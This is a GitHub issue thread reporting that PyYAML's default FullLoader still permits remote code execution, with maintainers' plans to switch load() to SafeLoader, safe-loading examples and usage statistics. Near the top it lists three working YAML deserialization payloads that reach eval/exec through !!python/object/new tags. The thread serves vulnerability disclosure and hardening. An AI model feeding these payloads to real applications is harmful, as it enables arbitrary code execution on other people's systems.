.load() and FullLoader still vulnerable to fairly trivial RCE
As of 5.3.1, .load() defaults to FullLoader, and FullLoader is still vulnerable to RCE when run on untrusted input. As the examples below demonstrate, #386 was not enough to fix this issue.
Some example payloads:
!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - [ "RCE_HERE" ]

!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "RCE_HERE"

- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
I do not believe this is entirely fixable unless PyYAML decides to use secure defaults and make .load() equivalent to .safe_load() (#5).
FullLoader should probably be removed, as I don’t see the purpose of it.
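For reference, here is a minimal sketch of the behaviour this issue asks for as the default. It assumes PyYAML is installed. The helper name `load_untrusted` and the sample documents are made up for illustration and are not part of the original report. `yaml.safe_load` builds only plain Python types and raises a `ConstructorError` for `!!python/...` tags instead of resolving them.

```python
import yaml


def load_untrusted(text):
    """Parse YAML from an untrusted source with SafeLoader only.

    Hypothetical helper for illustration: returns plain Python data
    or raises a yaml.YAMLError subclass.
    """
    return yaml.safe_load(text)


# Plain data loads as ordinary dicts, lists, strings and numbers.
config = load_untrusted("name: demo\nports: [80, 443]\n")

# A Python-specific tag is rejected rather than resolved to an object.
# A harmless builtin name is used here; no payload from the report is run.
try:
    load_untrusted("!!python/name:len")
    rejected = False
except yaml.constructor.ConstructorError:
    rejected = True
```

Code that only needs config-style data loses nothing by going through a wrapper like this, which is the argument for making it the default.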
Issue Analytics
- State:
- Created 3 years ago
- Reactions:12
- Comments:44 (30 by maintainers)
Top GitHub Comments
https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation has been updated.
Moving forward:
- 5.4:
  - load remains FullLoader
- 6.0:
  - load will be switched to SafeLoader
  - load usage will be made
This is the rough plan. I’ll start working on the 5.4 release this week. See https://github.com/yaml/pyyaml/projects/5
Comments welcome.
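Whatever the default ends up being, callers can already name the loader explicitly so that behaviour does not depend on which PyYAML release is installed. A minimal sketch, assuming PyYAML is installed; the sample document is made up:

```python
import yaml

document = "release: 5.4\nloaders:\n  - SafeLoader\n  - FullLoader\n"

# Naming the loader explicitly avoids relying on load()'s default.
data = yaml.load(document, Loader=yaml.SafeLoader)

# safe_load() is shorthand for the same call.
same = yaml.safe_load(document)
```

Both calls return the same plain dictionary, so switching an existing `yaml.load(...)` call to either form is a one-line change for code that only reads plain data.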
@ingydotnet it’s still possible to get arbitrary code execution with only !!python/object/new, BTW.
Ultimately, it’s your choice what you decide to do with the library, but let me state my opinions.
I have definitely seen projects in the wild that load YAML via yaml.load() from untrusted sources. I can’t disclose specific names, but one example is a web portal that allowed users to upload YAML config files and then loaded them. Given some time, I could probably find several on GitHub if you would like.
Developers tend to be lazy; no one wants to read the docs. This is why it’s important to follow the principle of having secure defaults. It’s important for a library to attempt to protect its users (even if they don’t read :p)
Here’s a quote from the ReactJS (popular Facebook-made frontend library) documentation which explains their reasoning for their function dangerouslySetInnerHTML. I wholeheartedly agree with them.
My observation is that the mental model many developers have of YAML is that it’s a simple data interchange format exactly like JSON, not a complex serialization language. In the same way they don’t expect json.load() to lead to code execution, they don’t expect yaml.load() to lead to code execution.
I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML’s ability to serialize complex objects? I don’t have too much insight into this, but my guess is: not many.
From a quick GitHub code search, there are ~762k files that use PyYAML. Of those, up to 529k files currently use the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution. 220k call safe_load or specify SafeLoader, and only 13k explicitly use unsafe_load or specify UnsafeLoader.
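A breakdown like this can be approximated for a single codebase. The following is a rough sketch using only the standard library `ast` module. The function names and the bucket names are made up here, it only recognises calls spelled `yaml.<name>(...)`, and it is not the method used for the GitHub search above.

```python
import ast

# Map an explicitly named loader class to a bucket (illustrative only).
LOADER_BUCKETS = {
    "FullLoader": "full",
    "SafeLoader": "safe",
    "UnsafeLoader": "unsafe",
}


def _bucket_for_loader(call):
    """Return the bucket for a yaml.load(...) call node."""
    # The loader may be the second positional argument or a keyword.
    loader = call.args[1] if len(call.args) > 1 else None
    for keyword in call.keywords:
        if keyword.arg == "Loader":
            loader = keyword.value
    if loader is None:
        # No loader given: FullLoader by default as of 5.3.1, per the issue.
        return "full"
    name = getattr(loader, "attr", None) or getattr(loader, "id", None)
    return LOADER_BUCKETS.get(name, "other")


def classify_yaml_calls(source):
    """Count yaml load calls in Python source by the loader they use."""
    counts = {"full": 0, "safe": 0, "unsafe": 0, "other": 0}
    for node in ast.walk(ast.parse(source)):
        is_yaml_call = (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "yaml"
        )
        if not is_yaml_call:
            continue
        func = node.func.attr
        if func == "safe_load":
            counts["safe"] += 1
        elif func == "unsafe_load":
            counts["unsafe"] += 1
        elif func == "load":
            counts[_bucket_for_loader(node)] += 1
    return counts


# The sample is only parsed, never executed.
sample = """
import yaml
a = yaml.load(text)
b = yaml.safe_load(text)
c = yaml.load(text, Loader=yaml.SafeLoader)
d = yaml.load(text, Loader=yaml.FullLoader)
e = yaml.unsafe_load(text)
"""
counts = classify_yaml_calls(sample)
```

Calls that land in the `full` bucket are the ones worth reviewing first, since they are the ones that depend on the library default.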